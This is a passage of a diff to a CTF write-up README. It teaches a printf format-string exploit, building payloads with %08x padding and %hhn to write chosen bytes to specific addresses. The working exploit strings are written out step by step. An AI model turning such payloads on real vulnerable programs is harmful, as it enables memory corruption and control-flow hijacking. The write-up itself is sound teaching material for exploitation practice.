extremecoders-re/tamu-ctf-writeup/README.md

 \x1d\xa0\x04\x08\x1c\xa0\x04\x08%08x%08x%08xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 ```

-Alternatively, we can make the last `%08x` to display 109 bytes using space padding:
+Alternatively, we can make the last or anyone of the `%08x` to display 109 bytes using space padding:

 ```
 \x1d\xa0\x04\x08\x1c\xa0\x04\x08%08x%08x%109x
 ```

 Number of bytes displayed till now is 133.
 We can use the [format specifier](http://www.cplusplus.com/reference/cstdio/printf/) `%hhn` to write this value at the address specified.
-The address is a pointer to a variable and usually passed as an argument to printf.
+The address is a pointer to a variable and usually passed as an argument to `printf`.
 Here we have provided the address \(`0804A01D`\) at the beginning of the string itself.

 ```
 \x1d\xa0\x04\x08\x1c\xa0\x04\x08%08x%08x%109x%hhn
 ```

-`hh` is the length sub-specifier and it indicates to write a byte value i.e. the address is a pointer to a byte.
+`hh` is the **length sub-specifier** and it indicates to **write a byte value** i.e. the address is a pointer to a byte.
 If the value to write is larger than a byte, it would be automatically **wrapped**.
 The situation is similar for other length sub-specifiers such as `h`, `l` and `ll`.
 Without any length sub-specifier it defaults to `int`.

 Now, at this point, we have written `0x85` \(133\) to the location `0804A01D`.
 In this process we have also displayed 133 bytes on the terminal.

 The next task is to write `0xAB` \(171\) to the location `0804A01C` and for that we need to display `171 - 133 = 38` more bytes.
 These bytes can again be simply appended to the exploit string.
-Using this approach our final exploit string would be:
+Using this approach our exploit string would be:

 ```
 \x1d\xa0\x04\x08\x1c\xa0\x04\x08%08x%08x%109x%hhnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%hhn